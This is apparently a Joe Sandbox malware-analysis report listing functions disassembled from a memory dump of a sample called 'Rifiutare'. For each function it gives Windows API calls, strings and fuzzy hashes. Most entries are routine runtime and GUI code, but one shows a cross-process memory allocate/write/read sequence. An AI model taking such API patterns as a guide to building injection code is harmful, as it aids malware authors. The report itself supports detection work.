Opcode ID: b2fff6e10dcec8709a77c80df0aa035ae46ea1ef4186f4f42ae14918f96ea726
Instruction ID: 1a070e1697575c42f192cbcf39931cecccdfdda1eaf3740f3f4b19e792b82435
Opcode Fuzzy Hash: b2fff6e10dcec8709a77c80df0aa035ae46ea1ef4186f4f42ae14918f96ea726
Instruction Fuzzy Hash: 3E018FB2B016157F23312ABAACD8E7F6B6DDEC6FA13190179FD06D2200DE60CD0191B1

Function 00C63218 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,?,00C62C3D,00C63C83,?,?,00C50215,00000000,?,00C38E5F,00000004,?,00C74C6B), ref: 00C6321D
_free.LIBCMT ref: 00C63252
_free.LIBCMT ref: 00C63279
SetLastError.KERNEL32(00000000), ref: 00C63286
SetLastError.KERNEL32(00000000), ref: 00C6328F

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 03412954ec324a7c5c15bd5596b27bd184b14ad42639341d6a4e3e901d0cffcb
Instruction ID: 26df8b049f0eee108dd97da8ab5adb8804514e16e97a916ccbd1c4f632022db5
Opcode Fuzzy Hash: 03412954ec324a7c5c15bd5596b27bd184b14ad42639341d6a4e3e901d0cffcb
Instruction Fuzzy Hash: DA01A976144A8067C23267359CD9F6E176EAFD53707350128F92692193EF74CB05A131

Function 00C9082D Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C90760,80070057,?,?,?,00C90B7D), ref: 00C9084A
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C90760,80070057,?,?), ref: 00C90865
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C90760,80070057,?,?), ref: 00C90873
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C90760,80070057,?), ref: 00C90883
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C90760,80070057,?,?), ref: 00C9088F

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: ab71ccdc11de68f5b64655b07bf36c1aeebb7819988d4f3a6da22ee6795efc63
Instruction ID: e242d16c2c3280499fd45de3b624aa5ec61ff87d29476d1f1e0762eb54c10d8b
Opcode Fuzzy Hash: ab71ccdc11de68f5b64655b07bf36c1aeebb7819988d4f3a6da22ee6795efc63
Instruction Fuzzy Hash: BA017872600204AFDB115F54CC48FAE7BADEB847A2F240024F91AE6290E770DE809BE0

Function 00C9F152 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 00C9F16E
QueryPerformanceFrequency.KERNEL32(?), ref: 00C9F17C
Sleep.KERNEL32(00000000), ref: 00C9F184
QueryPerformanceCounter.KERNEL32(?), ref: 00C9F18E
Sleep.KERNEL32 ref: 00C9F1CA

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: f55f345bde9b318fa013a0e724108fdbd1ccb9bb22d891535b708530b02ab89e
Instruction ID: b2cd1fcc9984f5e725603bab8ee3f4c1644be580a8a3bce602968574307dc9ea
Opcode Fuzzy Hash: f55f345bde9b318fa013a0e724108fdbd1ccb9bb22d891535b708530b02ab89e
Instruction Fuzzy Hash: 46011371C00629EBCF00AFA5D84DBEEBB79FB09711F05006AE912F2264DB309655C7A1

Function 00C9188E Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C918A4
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C918B0
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C918BF
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C918C6
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C918DC

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 25213c11a70cbc5c1926c17e0e39fdabbc9ecab1231b6d4bd4d6954139081541
Instruction ID: a9c4ec39d450705b7accde4278be90895c9bd5be488d7854f2027e2ab7110f8a
Opcode Fuzzy Hash: 25213c11a70cbc5c1926c17e0e39fdabbc9ecab1231b6d4bd4d6954139081541
Instruction Fuzzy Hash: 18F06275100301ABDB121FA5EC4DF5A3B6DEF89760F150425FD4ACB2A0DA70D9019A60

Function 00C9182E Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C91844
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C91850
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C9185F
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C91866
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C9187C

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 5493d08551e6403967bd5246e564abe9d672552b2d8d2583d0583f352179a8e1
Instruction ID: 4f879745e4a0edafb5c8f4a0877e86d22a3d46f448e827336f2ce295423cdc14
Opcode Fuzzy Hash: 5493d08551e6403967bd5246e564abe9d672552b2d8d2583d0583f352179a8e1
Instruction Fuzzy Hash: 7FF06D76200302ABDB111FA9DC4EF9A3BADEF89760F160464FE56C72A0DA70DC018A60

Function 00CA0B69 Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,00CA09E1,?,00CA3C13,?,00000001,00C74EA0,?), ref: 00CA0B7E
CloseHandle.KERNEL32(?,?,?,?,00CA09E1,?,00CA3C13,?,00000001,00C74EA0,?), ref: 00CA0B8B
CloseHandle.KERNEL32(?,?,?,?,00CA09E1,?,00CA3C13,?,00000001,00C74EA0,?), ref: 00CA0B98
CloseHandle.KERNEL32(?,?,?,?,00CA09E1,?,00CA3C13,?,00000001,00C74EA0,?), ref: 00CA0BA5
CloseHandle.KERNEL32(?,?,?,?,00CA09E1,?,00CA3C13,?,00000001,00C74EA0,?), ref: 00CA0BB2
CloseHandle.KERNEL32(?,?,?,?,00CA09E1,?,00CA3C13,?,00000001,00C74EA0,?), ref: 00CA0BBF

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 5786162e55171ace6b0e4d463c51216506e84a60533e474cc68c7dc9852172d0
Instruction ID: ffcbcd2af07d691c56e48886aa89dcec4f61f8de12f995cb3823946e487f93d4
Opcode Fuzzy Hash: 5786162e55171ace6b0e4d463c51216506e84a60533e474cc68c7dc9852172d0
Instruction Fuzzy Hash: 3701A271801B16DFCB309F66E980816FBF5BF513593258A3ED1A752931C370AA49CF90

Function 00C96460 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00C96474
GetWindowTextW.USER32(00000000,?,00000100), ref: 00C9648B
MessageBeep.USER32(00000000), ref: 00C964A3
KillTimer.USER32(?,0000040A), ref: 00C964BF
EndDialog.USER32(?,00000001), ref: 00C964D9

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 61b7414065d7189eeb4408f46ec5f7cec72042d7f9e5d566b716eb7d0bb8707f
Instruction ID: 880ae3279fc88c84c6b0ae83f25b94cfe9e53834772ad875dbe061654b71f339
Opcode Fuzzy Hash: 61b7414065d7189eeb4408f46ec5f7cec72042d7f9e5d566b716eb7d0bb8707f
Instruction Fuzzy Hash: 9D013130500714ABEF359B60DD5EF9A77B8BF00705F004969F697A14E1DBF4AA54CB90

Function 00C62630 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00C6264E

Part of subcall function 00C62DE8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C6DBF1,?,00000000,?,00000000,?,00C6DC18,?,00000007,?,?,00C6E016,?), ref: 00C62DFE
Part of subcall function 00C62DE8: GetLastError.KERNEL32(?,?,00C6DBF1,?,00000000,?,00000000,?,00C6DC18,?,00000007,?,?,00C6E016,?,?), ref: 00C62E10

_free.LIBCMT ref: 00C62660
_free.LIBCMT ref: 00C62673
_free.LIBCMT ref: 00C62684
_free.LIBCMT ref: 00C62695

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1057b6969cef02d1ca595b205fe20d270584f40ef0b16dfb1de4e17ddcd6cd26
Instruction ID: 7572f2a52af23ec535856a1c7cbd99d4d5bd05c0431fb9939df52c6e259ced81
Opcode Fuzzy Hash: 1057b6969cef02d1ca595b205fe20d270584f40ef0b16dfb1de4e17ddcd6cd26
Instruction Fuzzy Hash: B4F0DA75802B219BCA216F65BC857683B66BF147A17010107F459E63B1CB314942EBEA

Function 00C612D7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 00C61489
__freea.LIBCMT ref: 00C614A7

Part of subcall function 00C618C7: _free.LIBCMT ref: 00C618DF

Strings

a/p, xrefs: 00C6156E
am/pm, xrefs: 00C6150A

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 7500b462faeb32b8d10566208a97f2bb209d9f0bf6b1a0d68c708230be899e1b
Instruction ID: f7b26d1acb3eadedd38601a556fb3f821a56e5bc19fef023eacf3e9b7a2a787d
Opcode Fuzzy Hash: 7500b462faeb32b8d10566208a97f2bb209d9f0bf6b1a0d68c708230be899e1b
Instruction Fuzzy Hash: 75D11475904206CBDB389F69C8D57BAB7B1FF05312F2C4159ED22AB250D7358E81DBA0

Function 00C34C04 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00C746C0

Part of subcall function 00C3B0DB: _wcslen.LIBCMT ref: 00C3B0EE

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C34CF4

Strings

AutoIt - , xrefs: 00C34C68
Line %d: , xrefs: 00C7473E

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line %d: $AutoIt -
API String ID: 2289894680-4094128768
Opcode ID: 9d127e6f04fba829caac2cf4584c231f165dc738f85b0ea6f8eccc5555e46034
Instruction ID: eccd549f06d2c9b31718bb981bfd8fff94d5db6505a019e813a402b5fc8866fb
Opcode Fuzzy Hash: 9d127e6f04fba829caac2cf4584c231f165dc738f85b0ea6f8eccc5555e46034
Instruction Fuzzy Hash: DD41D7714193046AC729EB20EC45FEF77DCAF44710F004A2EF599931A1EB70AA49D797

Function 00C92F16 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C9BC27: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C929D0,?,?,00000034,00000800,?,00000034), ref: 00C9BC51

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C92F60

Part of subcall function 00C9BBF2: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C929FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00C9BC1C

Part of subcall function 00C9BB4E: GetWindowThreadProcessId.USER32(?,?), ref: 00C9BB79
Part of subcall function 00C9BB4E: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C92994,00000034,?,?,00001004,00000000,00000000), ref: 00C9BB89
Part of subcall function 00C9BB4E: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C92994,00000034,?,?,00001004,00000000,00000000), ref: 00C9BB9F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C92FCD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C9301A

Strings

@, xrefs: 00C93032

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: e147486edb675df9dca75d48ec0f7e054933edf62ccd3d7322465769eb39aae5
Instruction ID: 5bc13643da94bdc4857577f25a9da187ea6a6c4c78e8fb5b9caac449642abd98
Opcode Fuzzy Hash: e147486edb675df9dca75d48ec0f7e054933edf62ccd3d7322465769eb39aae5
Instruction Fuzzy Hash: DD410876900218BBDF10DFA4CD85AEEBBB8EB49700F004095FA55B7180DB70AE85DB61

Function 00C9C9D3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00C9CA5C
DeleteMenu.USER32(?,00000007,00000000), ref: 00C9CAA2
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00D029B0,017B4310), ref: 00C9CAEB

Strings

0, xrefs: 00C9CA35

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: cd59edcac0fd67b9e15a4b44f77c15ca8c63140e097506ff782cb3050b85a45d
Instruction ID: 702c5de6e79b286a685032fdfdac194d003c30a4677a8f7c06eb17e4bc16721d
Opcode Fuzzy Hash: cd59edcac0fd67b9e15a4b44f77c15ca8c63140e097506ff782cb3050b85a45d
Instruction Fuzzy Hash: D741A0712043419FDB20DF24C8C9F1ABBE4EF85754F14462DF56597292EB70EA04DB62

Function 00CC4AF2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00CCDBF4,00000000,?,?,?,?), ref: 00CC4B86
GetWindowLongW.USER32 ref: 00CC4BA3
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CC4BB3

Strings

SysTreeView32, xrefs: 00CC4B58

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: ddc2ec2b7276b9d60dd5b310be85edbbc4c82b723712bdff8938c1eb065030e4
Instruction ID: 6becd0afb32f2a4bca77fb7404c2c7521c54d30ddd9dcc62d822c0f395c36248
Opcode Fuzzy Hash: ddc2ec2b7276b9d60dd5b310be85edbbc4c82b723712bdff8938c1eb065030e4
Instruction Fuzzy Hash: B6317C31200609ABDB158E74CCA5FEA7BA9EB48334F208728F979921E0D730ED519B50

Function 00CB3821 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB3B2E: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00CB384A,?,?), ref: 00CB3B4B

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00CB384D
_wcslen.LIBCMT ref: 00CB386E
htons.WSOCK32(00000000,?,?,00000000), ref: 00CB38D9

Strings

255.255.255.255, xrefs: 00CB3868, 00CB386D

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 862fa8c3103239616c0c0bf832607f9afedfd6b68d002b699f3a2d8dd2cc6f8d
Instruction ID: 2a6187aa765034886aaee54435131c46c5f1da563818bf01fb3ce3f795208cf8
Opcode Fuzzy Hash: 862fa8c3103239616c0c0bf832607f9afedfd6b68d002b699f3a2d8dd2cc6f8d
Instruction Fuzzy Hash: 3331E1796002819FCB10CF69C485EA97BE1EF14318F24815AF8268B3E2D772EF45C761

Function 00CC4592 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00CC461A
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00CC462E
SendMessageW.USER32(?,00001002,00000000,?), ref: 00CC4652

Strings

SysMonthCal32, xrefs: 00CC45E5

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: ffcf069c949ce604f60a31fc3be40d3217dfcea6c80e18357c7959aac18e1dd6
Instruction ID: cb35ac736670551835bcd18e05d7725783a3d68b47300360b789cddedb9a0075
Opcode Fuzzy Hash: ffcf069c949ce604f60a31fc3be40d3217dfcea6c80e18357c7959aac18e1dd6
Instruction Fuzzy Hash: 0921D132600228BBDF158F64CC46FEE3B65EF48714F114218FE15AB1D0DAB1E855DB90

Function 00CC4D2F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00CC4DE1
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00CC4DEF
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00CC4DF6

Strings

msctls_updown32, xrefs: 00CC4D60

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 42640ffdd2559c65baad024def34c4c845485c051ad6254bdc34f5463c001778
